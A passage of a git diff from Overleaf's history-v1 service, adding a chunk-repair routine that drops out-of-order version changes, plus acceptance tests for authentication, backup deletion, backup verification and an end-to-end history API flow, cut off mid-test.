chunkStore.loadLatest(projectId) + let numChanges = 0 + numChanges += removeDuplicateProjectVersions(chunk) + numChanges += removeDuplicateDocVersions(chunk) + console.log(` ${numChanges > 0 ? numChanges : 'no'} changes`) + if (save && numChanges > 0) { + await replaceChunk(projectId, chunk) + } +} + +function removeDuplicateProjectVersions(chunk) { + let numChanges = 0 + let lastVersion = null + const { snapshot, changes } = chunk.history + if (snapshot.projectVersion != null) { + lastVersion = snapshot.projectVersion + } + for (const change of changes) { + if (change.projectVersion == null) { + // Not a project structure change. Ignore. + continue + } + if ( + lastVersion != null && + !areProjectVersionsIncreasing(lastVersion, change.projectVersion) + ) { + // Duplicate. Remove all ops + console.log( + ` Removing out-of-order project structure change: ${change.projectVersion} <= ${lastVersion}` + ) + change.setOperations([]) + delete change.projectVersion + numChanges++ + } else { + lastVersion = change.projectVersion + } + } + + return numChanges +} + +function removeDuplicateDocVersions(chunk) { + let numChanges = 0 + const lastVersions = new Map() + const { snapshot, changes } = chunk.history + if (snapshot.v2DocVersions != null) { + // Seed with the snapshot's versions, keyed by doc id to match the + // lookups below. + for (const [docId, { v }] of Object.entries(snapshot.v2DocVersions.data)) { + lastVersions.set(docId, v) + } + } + for (const change of changes) { + if (change.v2DocVersions == null) { + continue + } + + // Collect all docs that have problematic versions + const badPaths = [] + const badDocIds = [] + for (const [docId, { pathname, v }] of Object.entries( + change.v2DocVersions.data + )) { + const lastVersion = lastVersions.get(docId) + if (lastVersion != null && v <= lastVersion) { + // Duplicate. 
Remove ops related to that doc + console.log( + ` Removing out-of-order change for doc ${docId} (${pathname}): ${v} <= ${lastVersion}` + ) + badPaths.push(pathname) + badDocIds.push(docId) + numChanges++ + } else { + lastVersions.set(docId, v) + } + } + + // Remove bad operations + if (badPaths.length > 0) { + change.setOperations( + change.operations.filter( + op => op.pathname == null || !badPaths.includes(op.pathname) + ) + ) + } + + // Remove bad v2 doc versions + for (const docId of badDocIds) { + delete change.v2DocVersions.data[docId] + } + } + + return numChanges +} + +function areProjectVersionsIncreasing(v1Str, v2Str) { + const v1 = parseProjectVersion(v1Str) + const v2 = parseProjectVersion(v2Str) + return v2.major > v1.major || (v2.major === v1.major && v2.minor > v1.minor) +} + +function parseProjectVersion(version) { + const [major, minor] = version.split('.').map(x => parseInt(x, 10)) + if (isNaN(major) || isNaN(minor)) { + throw new Error(`Invalid project version: ${version}`) + } + return { major, minor } +} + +async function replaceChunk(projectId, chunk) { + const endVersion = chunk.getEndVersion() + const oldChunkId = await chunkStore.getChunkIdForVersion( + projectId, + endVersion + ) + console.log(` Replacing chunk ${oldChunkId}`) + // The chunks table has a unique constraint on doc_id and end_version. Because + // we're replacing a chunk with the same end version, we need to destroy the + // chunk first. + await chunkStore.destroy(projectId, oldChunkId) + await chunkStore.create(projectId, chunk) +} diff --git a/services/history-v1/storage/tasks/index.js b/services/history-v1/storage/tasks/index.js new file mode 100644 index 0000000..65bed63 --- /dev/null +++ b/services/history-v1/storage/tasks/index.js @@ -0,0 +1 @@ +exports.deleteOldChunks = require('./delete_old_chunks').deleteOldChunks diff --git a/services/history-v1/test/acceptance/certs/.gitignore b/services/history-v1/test/acceptance/certs/.gitignore new file mode 100644 index 0000000..d6b7ef3 --- /dev/null +++ b/services/history-v1/test/acceptance/certs/.gitignore @@ -0,0 +1,2 @@ +* +!.gitignore diff --git a/services/history-v1/test/acceptance/js/api/auth.test.js b/services/history-v1/test/acceptance/js/api/auth.test.js new file mode 100644 index 0000000..65c9219 --- /dev/null +++ b/services/history-v1/test/acceptance/js/api/auth.test.js @@ -0,0 +1,195 @@ +const config = require('config') +const fetch = require('node-fetch') +const sinon = require('sinon') +const { expect } = require('chai') + +const cleanup = require('../storage/support/cleanup') +const expectResponse = require('./support/expect_response') +const fixtures = require('../storage/support/fixtures') +const HTTPStatus = require('http-status') +const testServer = require('./support/test_server') + +describe('auth', function () { + beforeEach(cleanup.everything) + beforeEach(fixtures.create) + beforeEach('Set up stubs', function () { + sinon.stub(config, 'has').callThrough() + sinon.stub(config, 'get').callThrough() + }) + afterEach(sinon.restore) + + it('renders 401 on swagger docs endpoint without auth', async function () { + const response = await fetch(testServer.url('/docs')) + expect(response.status).to.equal(HTTPStatus.UNAUTHORIZED) + expect(response.headers.get('www-authenticate')).to.match(/^Basic/) + }) + + it('renders swagger docs endpoint with auth', async function () { + const response = await fetch(testServer.url('/docs'), { + headers: { + Authorization: testServer.basicAuthHeader, + }, + }) + expect(response.ok).to.be.true + }) + + 
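// The password-rotation test below drives the stubbed config.has/config.get + // through the setMockConfig() helper defined at the end of this file. For + // reference, a Basic auth header for user "staging" with password "foo" is + // built as: 'Basic ' + Buffer.from('staging:foo').toString('base64') + + 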
it('takes an old basic auth password during a password change', async function () { + setMockConfig('basicHttpAuth.oldPassword', 'foo') + + // Primary should still work. + const response1 = await fetch(testServer.url('/docs'), { + headers: { + Authorization: testServer.basicAuthHeader, + }, + }) + expect(response1.ok).to.be.true + + // Old password should also work. + const response2 = await fetch(testServer.url('/docs'), { + headers: { + Authorization: 'Basic ' + Buffer.from('staging:foo').toString('base64'), + }, + }) + expect(response2.ok).to.be.true + + // Incorrect password should not work. + const response3 = await fetch(testServer.url('/docs'), { + headers: { + Authorization: 'Basic ' + Buffer.from('staging:bar').toString('base64'), + }, + }) + expect(response3.status).to.equal(HTTPStatus.UNAUTHORIZED) + }) + + it('renders 401 on ProjectImport endpoints', async function () { + const unauthenticatedClient = testServer.client + try { + await unauthenticatedClient.apis.ProjectImport.importSnapshot1({ + project_id: '1', + snapshot: { files: {} }, + }) + expect.fail() + } catch (err) { + expectResponse.unauthorized(err) + expect(err.response.headers['www-authenticate']).to.match(/^Basic/) + } + + // check that the snapshot was not persisted even if the response was a 401 + const projectClient = await testServer.createClientForProject('1') + try { + await projectClient.apis.Project.getLatestHistory({ project_id: '1' }) + expect.fail() + } catch (err) { + expectResponse.notFound(err) + } + }) + + it('renders 401 for JWT endpoints', function () { + return testServer.client.apis.Project.getLatestHistory({ + project_id: '10000', + }) + .then(() => { + expect.fail() + }) + .catch(err => { + expectResponse.unauthorized(err) + expect(err.response.headers['www-authenticate']).to.equal('Bearer') + }) + }) + + it('accepts basic auth in place of JWT (for now)', function () { + const projectId = fixtures.docs.initializedProject.id + return testServer.pseudoJwtBasicAuthClient.apis.Project.getLatestHistory({ + project_id: projectId, + }).then(response => { + expect(response.obj.chunk).to.exist + }) + }) + + it('uses JWT', function () { + const projectId = fixtures.docs.initializedProject.id + return testServer + .createClientForProject(projectId) + .then(client => { + return client.apis.Project.getLatestHistory({ + project_id: projectId, + }) + }) + .then(response => { + expect(response.obj.chunk).to.exist + }) + }) + + it('checks for project id', function () { + return testServer + .createClientForProject('1') + .then(client => { + return client.apis.Project.getLatestHistory({ + project_id: '2', + }) + }) + .then(() => { + expect.fail() + }) + .catch(expectResponse.forbidden) + }) + + it('does not accept jwt for ProjectUpdate endpoints', function () { + return testServer.createClientForProject('1').then(client => { + return client.apis.ProjectImport.importSnapshot1({ + project_id: '1', + snapshot: {}, + }) + .then(() => { + expect.fail() + }) + .catch(expectResponse.unauthorized) + }) + }) + + describe('when an old JWT key is defined', function () { + beforeEach(function () { + setMockConfig('jwtAuth.oldKey', 'old-secret') + }) + + it('accepts the old key', async function () { + const projectId = fixtures.docs.initializedProject.id + const client = await testServer.createClientForProject(projectId, { + jwtKey: 'old-secret', + }) + const response = await client.apis.Project.getLatestHistory({ + project_id: projectId, + }) + expect(response.obj.chunk).to.exist + }) + + it('accepts the new key', async 
function () { + const projectId = fixtures.docs.initializedProject.id + const client = await testServer.createClientForProject(projectId) + const response = await client.apis.Project.getLatestHistory({ + project_id: projectId, + }) + expect(response.obj.chunk).to.exist + }) + + it('rejects other keys', async function () { + const projectId = fixtures.docs.initializedProject.id + const client = await testServer.createClientForProject(projectId, { + jwtKey: 'bad-secret', + }) + try { + await client.apis.Project.getLatestHistory({ + project_id: projectId, + }) + expect.fail() + } catch (err) { + expectResponse.unauthorized(err) + } + }) + }) +}) + +function setMockConfig(path, value) { + config.has.withArgs(path).returns(true) + config.get.withArgs(path).returns(value) +} diff --git a/services/history-v1/test/acceptance/js/api/backupDeletion.test.mjs b/services/history-v1/test/acceptance/js/api/backupDeletion.test.mjs new file mode 100644 index 0000000..46512d1 --- /dev/null +++ b/services/history-v1/test/acceptance/js/api/backupDeletion.test.mjs @@ -0,0 +1,244 @@ +// @ts-check +import cleanup from '../storage/support/cleanup.js' +import fetch from 'node-fetch' +import testServer from './support/test_backup_deletion_server.mjs' +import { expect } from 'chai' +import testProjects from './support/test_projects.js' +import { db } from '../../../../storage/lib/mongodb.js' +import { ObjectId } from 'mongodb' +import { + backupPersistor, + projectBlobsBucket, + chunksBucket, +} from '../../../../storage/lib/backupPersistor.mjs' +import { makeProjectKey } from '../../../../storage/lib/blob_store/index.js' +import config from 'config' +import Stream from 'stream' +import projectKey from '../../../../storage/lib/project_key.js' + +/** + * @typedef {import("node-fetch").Response} Response + */ + +const { deksBucket } = config.get('backupStore') + +const deletedProjectsCollection = db.collection('deletedProjects') + +/** + * @param {string} bucket + * @param {string} prefix + * @return {Promise<Array<string>>} + */ +async function listS3Bucket(bucket, prefix) { + // @ts-ignore access to internal library helper + const client = backupPersistor._getClientForBucket(bucket) + const response = await client + .listObjectsV2({ Bucket: bucket, Prefix: prefix }) + .promise() + return (response.Contents || []).map(item => item.Key || '') +} + +/** + * @param {ObjectId} projectId + * @return {Promise<Response>} + */ +async function deleteProject(projectId) { + return await fetch(testServer.testUrl(`/project/${projectId}/backup`), { + method: 'DELETE', + headers: { Authorization: testServer.basicAuthHeader }, + }) +} + +/** + * @param {number|ObjectId} historyId + * @return {Promise<void>} + */ +async function expectToHaveBackup(historyId) { + const prefix = projectKey.format(historyId.toString()) + '/' + expect(await listS3Bucket(deksBucket, prefix)).to.have.length(1) + expect(await listS3Bucket(chunksBucket, prefix)).to.have.length(2) + expect(await listS3Bucket(projectBlobsBucket, prefix)).to.have.length(2) +} + +/** + * @param {number|ObjectId} historyId + * @return {Promise<void>} + */ +async function expectToHaveNoBackup(historyId) { + const prefix = projectKey.format(historyId.toString()) + '/' + expect(await listS3Bucket(deksBucket, prefix)).to.have.length(0) + expect(await listS3Bucket(chunksBucket, prefix)).to.have.length(0) + expect(await listS3Bucket(projectBlobsBucket, prefix)).to.have.length(0) +} + +describe('backupDeletion', function () { + beforeEach(cleanup.everything) + beforeEach('create health 
check projects', async function () { + await testProjects.createEmptyProject('42') + await testProjects.createEmptyProject('000000000000000000000042') + }) + beforeEach(testServer.listenOnRandomPort) + + it('renders 200 on /status', async function () { + const response = await fetch(testServer.testUrl('/status')) + expect(response.status).to.equal(200) + }) + + it('renders 200 on /health_check', async function () { + const response = await fetch(testServer.testUrl('/health_check')) + expect(response.status).to.equal(200) + }) + + describe('DELETE /project/:projectId', function () { + const postgresHistoryId = 1 + const projectIdPostgres = new ObjectId('000000000000000000000001') + const projectIdMongoDB = new ObjectId('000000000000000000000002') + const projectIdNonDeleted = new ObjectId('000000000000000000000003') + const projectIdNonExpired = new ObjectId('000000000000000000000004') + const projectIdWithChunks = new ObjectId('000000000000000000000005') + const projectIdNoHistoryId = new ObjectId('000000000000000000000006') + + beforeEach('populate mongo', async function () { + await deletedProjectsCollection.insertMany([ + { + _id: new ObjectId(), + deleterData: { + deletedProjectId: projectIdPostgres, + deletedAt: new Date('2024-01-01T00:00:00Z'), + deletedProjectOverleafHistoryId: postgresHistoryId, + }, + }, + { + _id: new ObjectId(), + deleterData: { + deletedProjectId: projectIdNonExpired, + deletedAt: new Date(), + deletedProjectOverleafHistoryId: projectIdNonExpired.toString(), + }, + }, + { + _id: new ObjectId(), + deleterData: { + deletedProjectId: projectIdNoHistoryId, + deletedAt: new Date('2024-01-01T00:00:00Z'), + }, + }, + ...[projectIdMongoDB, projectIdWithChunks].map(projectId => { + return { + _id: new ObjectId(), + deleterData: { + deletedProjectId: projectId, + deletedAt: new Date('2024-01-01T00:00:00Z'), + deletedProjectOverleafHistoryId: projectId.toString(), + }, + } + }), + ]) + }) + + beforeEach('initialize history', async function () { + await testProjects.createEmptyProject(projectIdWithChunks.toString()) + }) + + beforeEach('create a file in s3', async function () { + const historyIds = [ + postgresHistoryId, + projectIdMongoDB, + projectIdNonDeleted, + projectIdNonExpired, + projectIdWithChunks, + projectIdNoHistoryId, + ] + const jobs = [] + for (const historyId of historyIds) { + jobs.push( + backupPersistor.sendStream( + projectBlobsBucket, + makeProjectKey(historyId, 'a'.repeat(40)), + Stream.Readable.from(['blob a']), + { contentLength: 6 } + ) + ) + jobs.push( + backupPersistor.sendStream( + projectBlobsBucket, + makeProjectKey(historyId, 'b'.repeat(40)), + Stream.Readable.from(['blob b']), + { contentLength: 6 } + ) + ) + jobs.push( + backupPersistor.sendStream( + chunksBucket, + projectKey.format(historyId) + '/111', + Stream.Readable.from(['chunk 1']), + { contentLength: 7 } + ) + ) + jobs.push( + backupPersistor.sendStream( + chunksBucket, + projectKey.format(historyId) + '/222', + Stream.Readable.from(['chunk 2']), + { contentLength: 7 } + ) + ) + } + await Promise.all(jobs) + }) + + it('renders 401 without auth', async function () { + const response = await fetch( + testServer.testUrl('/project/000000000000000000000042/backup'), + { method: 'DELETE' } + ) + expect(response.status).to.equal(401) + expect(response.headers.get('www-authenticate')).to.match(/^Basic/) + }) + + it('returns 422 when not deleted', async function () { + const response = await deleteProject(projectIdNonDeleted) + expect(response.status).to.equal(422) + expect(await 
response.text()).to.equal( + 'refusing to delete non-deleted project' + ) + await expectToHaveBackup(projectIdNonDeleted) + }) + it('returns 422 when not expired', async function () { + const response = await deleteProject(projectIdNonExpired) + expect(response.status).to.equal(422) + expect(await response.text()).to.equal( + 'refusing to delete non-expired project' + ) + await expectToHaveBackup(projectIdNonExpired) + }) + it('returns 422 when live-history not deleted', async function () { + const response = await deleteProject(projectIdWithChunks) + expect(response.status).to.equal(422) + expect(await response.text()).to.equal( + 'refusing to delete project with remaining chunks' + ) + await expectToHaveBackup(projectIdWithChunks) + }) + it('returns 422 when historyId is unknown', async function () { + const response = await deleteProject(projectIdNoHistoryId) + expect(response.status).to.equal(422) + expect(await response.text()).to.equal( + 'refusing to delete project with unknown historyId' + ) + await expectToHaveBackup(projectIdNoHistoryId) + }) + it('should successfully delete postgres id', async function () { + await expectToHaveBackup(postgresHistoryId) + const response = await deleteProject(projectIdPostgres) + expect(response.status).to.equal(204) + await expectToHaveNoBackup(postgresHistoryId) + }) + it('should successfully delete mongo id', async function () { + await expectToHaveBackup(projectIdMongoDB) + const response = await deleteProject(projectIdMongoDB) + expect(response.status).to.equal(204) + await expectToHaveNoBackup(projectIdMongoDB) + }) + }) +}) diff --git a/services/history-v1/test/acceptance/js/api/backupVerifier.test.mjs b/services/history-v1/test/acceptance/js/api/backupVerifier.test.mjs new file mode 100644 index 0000000..1fe09f4 --- /dev/null +++ b/services/history-v1/test/acceptance/js/api/backupVerifier.test.mjs @@ -0,0 +1,375 @@ +// @ts-check +import cleanup from '../storage/support/cleanup.js' +import fetch from 'node-fetch' +import testServer from './support/test_backup_verifier_server.mjs' +import { expect } from 'chai' +import testProjects from './support/test_projects.js' +import { + backupPersistor, + chunksBucket, + projectBlobsBucket, +} from '../../../../storage/lib/backupPersistor.mjs' +import { + BlobStore, + makeProjectKey, +} from '../../../../storage/lib/blob_store/index.js' +import Stream from 'node:stream' +import * as zlib from 'node:zlib' +import { promisify } from 'node:util' +import { execFile } from 'node:child_process' +import { NotFoundError } from '@overleaf/object-persistor/src/Errors.js' +import { chunkStore } from '../../../../storage/index.js' +import { Change, File, Operation } from 'overleaf-editor-core' +import Crypto from 'node:crypto' +import path from 'node:path' +import projectKey from '../../../../storage/lib/project_key.js' +import { historyStore } from '../../../../storage/lib/history_store.js' + +/** + * @typedef {import("node-fetch").Response} Response + * @typedef {import("overleaf-editor-core").Blob} Blob + */ + +async function verifyProjectScript(historyId, expectFail = true) { + try { + const result = await promisify(execFile)( + process.argv0, + ['storage/scripts/verify_project.mjs', `--historyId=${historyId}`], + { + encoding: 'utf-8', + timeout: 5_000, + env: { + ...process.env, + LOG_LEVEL: 'warn', + }, + } + ) + return { status: 0, stdout: result.stdout, stderr: result.stderr } + } catch (err) { + if ( + err && + typeof err === 'object' && + 'stdout' in err && + 'code' in err && + 'stderr' in err + ) { + 
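// execFile rejects with an Error that carries the child's exit code plus its + // captured stdout/stderr, so a non-zero exit from the verify script is + // translated into a plain result object here instead of being rethrown. + 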
if (!expectFail) { + console.log(err) + } + return { + stdout: typeof err.stdout === 'string' ? err.stdout : '', + status: typeof err.code === 'number' ? err.code : -1, + stderr: typeof err.stderr === 'string' ? err.stderr : '', + } + } + throw err + } +} + +/** + * @param {string} historyId + * @param {string} hash + * @return {Promise<{stdout: string, status:number }>} + */ +async function verifyBlobScript(historyId, hash, expectFail = true) { + try { + const result = await promisify(execFile)( + process.argv0, + [ + 'storage/scripts/verify_backup_blob.mjs', + `--historyId=${historyId}`, + hash, + ], + { + encoding: 'utf-8', + timeout: 5_000, + env: { + ...process.env, + LOG_LEVEL: 'warn', + }, + } + ) + return { status: 0, stdout: result.stdout } + } catch (err) { + if (err && typeof err === 'object' && 'stdout' in err && 'code' in err) { + if (!expectFail) { + console.log(err) + } + return { + stdout: typeof err.stdout === 'string' ? err.stdout : '', + status: typeof err.code === 'number' ? err.code : -1, + } + } + throw err + } +} +/** + * @param {string} historyId + * @param {string} hash + * @return {Promise<Response>} + */ +async function verifyBlobHTTP(historyId, hash) { + return await fetch( + testServer.testUrl(`/history/${historyId}/blob/${hash}/verify`), + { method: 'GET' } + ) +} + +async function backupChunk(historyId) { + const newChunk = await chunkStore.loadLatestRaw(historyId) + const { buffer: chunkBuffer } = await historyStore.loadRawWithBuffer( + historyId, + newChunk.id + ) + const md5 = Crypto.createHash('md5').update(chunkBuffer) + await backupPersistor.sendStream( + chunksBucket, + path.join( + projectKey.format(historyId), + projectKey.pad(newChunk.startVersion) + ), + Stream.Readable.from([chunkBuffer]), + { + contentType: 'application/json', + contentEncoding: 'gzip', + contentLength: chunkBuffer.byteLength, + sourceMd5: md5.digest('hex'), + } + ) +} + +const FIFTEEN_MINUTES_IN_MS = 900_000 + +async function addFileInNewChunk( + fileContents, + filePath, + historyId, + { creationDate = new Date() } +) { + const chunk = await chunkStore.loadLatest(historyId) + const operation = Operation.addFile( + filePath, + File.fromString(fileContents) + ) + const changes = [new Change([operation], creationDate, [])] + chunk.pushChanges(changes) + await chunkStore.update(historyId, 0, chunk) +} + +/** + * @param {string} historyId + * @param {Object} [backup] + * @return {Promise<string>} + */ +async function prepareProjectAndBlob( + historyId, + { shouldBackupBlob, shouldBackupChunk, shouldCreateChunk } = { + shouldBackupBlob: true, + shouldBackupChunk: true, + shouldCreateChunk: true, + } +) { + await testProjects.createEmptyProject(historyId) + const blobStore = new BlobStore(historyId) + const fileContents = historyId + const blob = await blobStore.putString(fileContents) + if (shouldCreateChunk) { + await addFileInNewChunk(fileContents, `${historyId}.txt`, historyId, { + creationDate: new Date(new Date().getTime() - FIFTEEN_MINUTES_IN_MS), + }) + } + + if (shouldBackupBlob) { + const gzipped = zlib.gzipSync(Buffer.from(historyId)) + await backupPersistor.sendStream( + projectBlobsBucket, + makeProjectKey(historyId, blob.getHash()), + Stream.Readable.from([gzipped]), + { contentLength: gzipped.byteLength, contentEncoding: 'gzip' } + ) + await checkDEKExists(historyId) + } + if (shouldCreateChunk && shouldBackupChunk) { + await backupChunk(historyId) + } + + return blob.getHash() +} + +/** + * @param {string} historyId + * @return {Promise<void>} + */ +async 
function checkDEKExists(historyId) { + await backupPersistor.forProjectRO( + projectBlobsBucket, + makeProjectKey(historyId, '') + ) +} + +describe('backupVerifier', function () { + const historyIdPostgres = '42' + const historyIdMongo = '000000000000000000000042' + let blobHashPG, blobHashMongo, blobPathPG + + beforeEach(cleanup.everything) + beforeEach('create health check projects', async function () { + ;[blobHashPG, blobHashMongo] = await Promise.all([ + prepareProjectAndBlob('42'), + prepareProjectAndBlob('000000000000000000000042'), + ]) + blobPathPG = makeProjectKey(historyIdPostgres, blobHashPG) + }) + beforeEach(testServer.listenOnRandomPort) + + it('renders 200 on /status', async function () { + const response = await fetch(testServer.testUrl('/status')) + expect(response.status).to.equal(200) + }) + + it('renders 200 on /health_check', async function () { + const response = await fetch(testServer.testUrl('/health_check')) + expect(response.status).to.equal(200) + }) + describe('storage/scripts/verify_project.mjs', function () { + describe('when the project is appropriately backed up', function () { + it('should return 0', async function () { + const response = await verifyProjectScript(historyIdPostgres, false) + expect(response.status).to.equal(0) + }) + }) + describe('when the project chunk is not backed up', function () { + let response + beforeEach(async function () { + await prepareProjectAndBlob('000000000000000000000043', { + shouldBackupChunk: false, + shouldBackupBlob: true, + shouldCreateChunk: true, + }) + response = await verifyProjectScript('000000000000000000000043') + }) + it('should return 1', async function () { + expect(response.status).to.equal(1) + }) + it('should emit an error message referring to a missing chunk', async function () { + const stderr = response.stderr + expect(stderr).to.include('BackupRPOViolationChunkNotBackedUpError') + }) + }) + describe('when a project blob is not backed up', function () { + let response + beforeEach(async function () { + await prepareProjectAndBlob('43', { + shouldBackupChunk: true, + shouldBackupBlob: false, + shouldCreateChunk: true, + }) + response = await verifyProjectScript('43') + }) + + it('should return 1', function () { + expect(response.status).to.equal(1) + }) + + it('includes a BackupCorruptedError in stderr', function () { + expect(response.stderr).to.include( + 'BackupCorruptedMissingBlobError: missing blob' + ) + }) + }) + }) + describe('storage/scripts/verify_backup_blob.mjs', function () { + it('throws and does not create DEK if missing', async function () { + const historyId = '404' + const hash = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' + const response = await verifyBlobScript(historyId, hash) + expect(response.status).to.equal(1) + expect(response.stdout).to.include('dek does not exist') + await expect(checkDEKExists(historyId)).to.be.rejectedWith(NotFoundError) + }) + it('throws when deleted in db', async function () { + const blobStore = new BlobStore(historyIdPostgres) + await blobStore.deleteBlobs() + const response = await verifyBlobScript(historyIdPostgres, blobHashPG) + expect(response.status).to.equal(1) + expect(response.stdout).to.include(`blob ${blobHashPG} not found`) + }) + it('throws when not existing', async function () { + await backupPersistor.deleteObject(projectBlobsBucket, blobPathPG) + const result = await verifyBlobScript(historyIdPostgres, blobHashPG) + expect(result.status).to.equal(1) + expect(result.stdout).to.include('missing blob') + }) + it('throws when corrupted', 
async function () { + await backupPersistor.sendStream( + projectBlobsBucket, + blobPathPG, + Stream.Readable.from(['something else']), + { contentLength: 14 } + ) + const result = await verifyBlobScript(historyIdPostgres, blobHashPG) + expect(result.status).to.equal(1) + expect(result.stdout).to.include('hash mismatch for backed up blob') + }) + it('should successfully verify from postgres', async function () { + const result = await verifyBlobScript( + historyIdPostgres, + blobHashPG, + false + ) + expect(result.status).to.equal(0) + expect(result.stdout.split('\n')).to.include('OK') + }) + it('should successfully verify from mongo', async function () { + const result = await verifyBlobScript( + historyIdMongo, + blobHashMongo, + false + ) + expect(result.status).to.equal(0) + expect(result.stdout.split('\n')).to.include('OK') + }) + }) + describe('GET /history/:historyId/blob/:hash/verify', function () { + it('returns 404 when deleted in db', async function () { + const blobStore = new BlobStore(historyIdPostgres) + await blobStore.deleteBlobs() + const response = await verifyBlobHTTP(historyIdPostgres, blobHashPG) + expect(response.status).to.equal(404) + expect(await response.text()).to.equal(`blob ${blobHashPG} not found`) + }) + it('returns 422 and does not create DEK if missing', async function () { + const historyId = '404' + const hash = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' + const response = await verifyBlobHTTP(historyId, hash) + expect(response.status).to.equal(422) + expect(await response.text()).to.equal('dek does not exist') + await expect(checkDEKExists(historyId)).to.be.rejectedWith(NotFoundError) + }) + it('returns 422 when not existing', async function () { + await backupPersistor.deleteObject(projectBlobsBucket, blobPathPG) + const response = await verifyBlobHTTP(historyIdPostgres, blobHashPG) + expect(response.status).to.equal(422) + expect(await response.text()).to.equal('missing blob') + }) + it('returns 422 when corrupted', async function () { + await backupPersistor.sendStream( + projectBlobsBucket, + blobPathPG, + Stream.Readable.from(['something else']), + { contentLength: 14 } + ) + const response = await verifyBlobHTTP(historyIdPostgres, blobHashPG) + expect(response.status).to.equal(422) + expect(await response.text()).to.equal('hash mismatch for backed up blob') + }) + it('should successfully verify from postgres', async function () { + const response = await verifyBlobHTTP(historyIdPostgres, blobHashPG) + expect(response.status).to.equal(200) + }) + it('should successfully verify from mongo', async function () { + const response = await verifyBlobHTTP(historyIdMongo, blobHashMongo) + expect(response.status).to.equal(200) + }) + }) +}) diff --git a/services/history-v1/test/acceptance/js/api/end_to_end.test.js b/services/history-v1/test/acceptance/js/api/end_to_end.test.js new file mode 100644 index 0000000..f3ad144 --- /dev/null +++ b/services/history-v1/test/acceptance/js/api/end_to_end.test.js @@ -0,0 +1,396 @@ +'use strict' + +const BPromise = require('bluebird') +const { expect } = require('chai') +const HTTPStatus = require('http-status') +const fetch = require('node-fetch') +const fs = BPromise.promisifyAll(require('node:fs')) + +const cleanup = require('../storage/support/cleanup') +const fixtures = require('../storage/support/fixtures') +const testFiles = require('../storage/support/test_files') +const testProjects = require('./support/test_projects') +const testServer = require('./support/test_server') + +const core = 
require('overleaf-editor-core') +const Change = core.Change +const ChunkResponse = core.ChunkResponse +const File = core.File +const Operation = core.Operation +const Snapshot = core.Snapshot +const TextOperation = core.TextOperation + +const blobHash = require('../../../../storage').blobHash + +describe('overleaf ot', function () { + beforeEach(cleanup.everything) + beforeEach(fixtures.create) + + this.timeout(10000) // it takes a while on Docker for Mac + + it('can use API', function () { + let client, downloadZipClient + + const basicAuthClient = testServer.basicAuthClient + return ( + testProjects + .createEmptyProject() + .then(projectId => { + return testServer + .createClientForProject(projectId) + .then(clientForProject => { + client = clientForProject + return testServer.createClientForDownloadZip(projectId) + }) + .then(clientForProject => { + downloadZipClient = clientForProject + return projectId + }) + }) + + // the project is currently empty + .then(projectId => { + return client.apis.Project.getLatestContent({ + project_id: projectId, + }).then(response => { + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(0) + return projectId + }) + }) + + // upload a blob and add two files using it + .then(projectId => { + return fetch( + testServer.url( + `/api/projects/${projectId}/blobs/${testFiles.GRAPH_PNG_HASH}`, + { qs: { pathname: 'graph_1.png' } } + ), + { + method: 'PUT', + body: fs.createReadStream(testFiles.path('graph.png')), + headers: { + Authorization: testServer.basicAuthHeader, + }, + } + ) + .then(response => { + expect(response.ok).to.be.true + }) + .then(() => { + const testFile = File.fromHash(testFiles.GRAPH_PNG_HASH) + + const change = new Change( + [ + Operation.addFile('graph_1.png', testFile), + Operation.addFile('graph_2.png', testFile), + ], + new Date() + ) + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: projectId, + end_version: 0, + return_snapshot: 'hashed', + changes: [change.toRaw()], + }) + }) + .then(() => projectId) + }) + + // get the new project state + .then(projectId => { + return client.apis.Project.getLatestContent({ + project_id: projectId, + }).then(response => { + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(2) + const file0 = snapshot.getFile('graph_1.png') + expect(file0.getHash()).to.equal(testFiles.GRAPH_PNG_HASH) + const file1 = snapshot.getFile('graph_2.png') + expect(file1.getHash()).to.equal(testFiles.GRAPH_PNG_HASH) + return projectId + }) + }) + + // get the history + .then(projectId => { + return client.apis.Project.getLatestHistory({ + project_id: projectId, + }).then(response => { + const chunk = ChunkResponse.fromRaw(response.obj).getChunk() + const changes = chunk.getChanges() + expect(changes.length).to.equal(1) + const change0Timestamp = changes[0].getTimestamp().getTime() + expect(change0Timestamp).to.be.closeTo(Date.now(), 1e4) + return projectId + }) + }) + + // upload an empty file + .then(projectId => { + return fetch( + testServer.url( + `/api/projects/${projectId}/blobs/${File.EMPTY_FILE_HASH}`, + { qs: { pathname: 'main.tex' } } + ), + { + method: 'PUT', + body: fs.createReadStream(testFiles.path('empty.tex')), + headers: { + Authorization: testServer.basicAuthHeader, + }, + } + ) + .then(response => { + expect(response.ok).to.be.true + }) + .then(() => { + const testFile = File.fromHash(File.EMPTY_FILE_HASH) + + const change = new Change( + [Operation.addFile('main.tex', testFile)], + new Date() + ) + 
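// end_version acts as an optimistic-concurrency check: it must match the + // project's current version, which is 1 here because exactly one change + // (the two graph_*.png additions) has been imported so far. + 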
return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: projectId, + end_version: 1, + return_snapshot: 'hashed', + changes: [change.toRaw()], + }) + }) + .then(() => projectId) + }) + + .then(projectId => { + // Fetch empty file blob + return client.apis.Project.getProjectBlob({ + project_id: projectId, + hash: File.EMPTY_FILE_HASH, + }) + .then(response => { + expect(response.headers['content-type']).to.equal( + 'application/octet-stream' + ) + return response.data.arrayBuffer() + }) + .then(buffer => { + expect(buffer).to.deep.equal(new ArrayBuffer(0)) + return projectId + }) + }) + + // get the history + .then(projectId => { + return client.apis.Project.getLatestHistory({ + project_id: projectId, + }).then(response => { + const chunk = ChunkResponse.fromRaw(response.obj).getChunk() + const changes = chunk.getChanges() + expect(changes.length).to.equal(2) + return projectId + }) + }) + + // get the new project state + .then(projectId => { + return client.apis.Project.getLatestContent({ + project_id: projectId, + }).then(response => { + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(3) + expect(snapshot.getFile('graph_1.png').getHash()).to.equal( + testFiles.GRAPH_PNG_HASH + ) + expect(snapshot.getFile('graph_2.png').getHash()).to.equal( + testFiles.GRAPH_PNG_HASH + ) + expect(snapshot.getFile('main.tex').getContent()).to.equal('') + return projectId + }) + }) + + // edit the main file + .then(projectId => { + const change = new Change( + [ + Operation.editFile( + 'main.tex', + TextOperation.fromJSON({ textOperation: ['hello'] 